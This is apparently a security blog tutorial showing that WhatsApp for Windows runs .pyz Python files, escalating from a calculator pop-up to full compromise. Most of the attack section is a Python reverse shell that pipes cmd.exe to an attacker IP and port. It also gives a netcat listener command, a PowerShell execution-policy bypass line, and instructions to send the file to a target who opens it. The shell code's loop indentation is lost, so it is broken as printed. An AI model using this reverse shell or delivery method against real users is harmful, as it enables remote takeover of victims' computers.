Hacking Windows via WhatsApp Messenger RCE

Hacking Windows via WhatsApp Messenger RCE

In July 2024, Reputed Cybersecurity blog Bleeping Computer reported that how the latest version of WhatsApp for Windows lets Python and PHP scripts to execute without any warning.

Hacking Windows via WhatsApp Messenger RCE

The similar issue was also found in Telegram in April which was later patched, where attackers can execute malicious python file with .pyz extension to get access to the running Windows Machine. The condition for the attack to be successful was that python must be installed on the Windows machine.

Further, a security researcher named Saumyajeet Das tested the same bug on WhatsApp Messenger and found out that while WhatsApp was blocking multiple file types including EXE, .COM, .SCR, .BAT, .PS1, .DLL, .HTA and .VBS but was allowing python extensions like .PYZ (Python ZIP app), .PYZW (PyInstaller program). Along with PHP scripts and .EVTX (Windows event Log file).

So, in this article we will test the same vulnerability in the latest version of WhatsApp Messenger for Windows. On that note, lets get started.

Preparing the Environment:

  • For the demonstration, i have downloaded the latest version of WhatsApp Messenger from Microsoft store which is – 2.2439.7.0

WhatsApp version

  • I have logged in using my personal WhatsApp account.

WhatsApp chat

Testing the Bug:

  • Now if i drag and drop calc.exe file in the chatbox and try to directly run it using the “open” button. I can see the “Save failed” message. That means, WhatsApp is blocking the executable file types.

calc.exe

Save failed

  • Next, I tried with a Powershell script that will also pop-up a calculator. Again, i got a “Save failed” message.

# Powershell script to pop-up calculator

powershell -ep bypass
Start-Process calc

script.ps1

Save failed

  • Now lets try with the alleged python extension – .pyz. I have created a file with the following code that will pop-up the calculator if all goes well but before that make sure that python is installed in your system.

# Python code to pop-up calculator

import os
os.system("calc.exe")

calc.pyz

Calculator App

  • Voila! We got the calculator popped up. That means, the code execution is working on the latest version of WhatsApp. Now, lets fully compromise this Windows machine.

Gaining God Access on target:

  • To get full access on the target, we will now use a python based reverse shell. I am using the below code to spawn a reverse shell on the target.

import socket  
import os  
import threading  
import subprocess as sp  
  
ip_addr = '192.168.29.160'  # Attack machine IP
port =  7777                # Listener Port
  
# Set up the subprocess to run cmd.exe  
p = sp.Popen(['cmd.exe'], stdin=sp.PIPE, stdout=sp.PIPE, stderr=sp.STDOUT)  
  
# Create a socket and connect to the specified address and port  
s = socket.socket()  
s.connect((ip_addr, port))  
  
# Define the function to read from the subprocess stdout and send to the socket  
def read_and_send():  
while True:  
o = os.read(p.stdout.fileno(), 1024)  
s.send(o)  
  
# Define the function to receive from the socket and write to the subprocess stdin  
def recv_and_write():  
while True:  
i = s.recv(1024)  
os.write(p.stdin.fileno(), i)  
  
# Start the threads to run the above functions  
threading.Thread(target=read_and_send, daemon=True).start()  
threading.Thread(target=recv_and_write).start()

  • Before executing our shell.pyz on the target. Lets setup our netcat listener on port 7777.

nc -lvnp 7777

netcat listener

  • Now lets share the file to the target on WhatsApp and once he clicks on open. Boom! We got shell access on the target and now we can do whatever we want.

shell.pyz

Full shell access

Also Read: Vulnlab – Sync

Conclusion:

Conclusion

So, We just saw how this vulnerability is still valid in the wild and there is no fix for it. As per the article, Saumyajeet has already reported this to Meta and they had acknowledged the vulnerability but has not taken immediate action to address it, instead placing the onus on users to avoid opening unknown files. This response has drawn criticism, especially considering the potential for malicious exploitation through shared attachments in both private and public chats.

In my opinion, this can be easily mitigated by just updating the filtering list of file uploads in WhatsApp and adding these python and PHP based extensions in them to avoid further exploitation. On that note, i will take your leave and will meet you in the next one, till then “Happy Hacking!”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top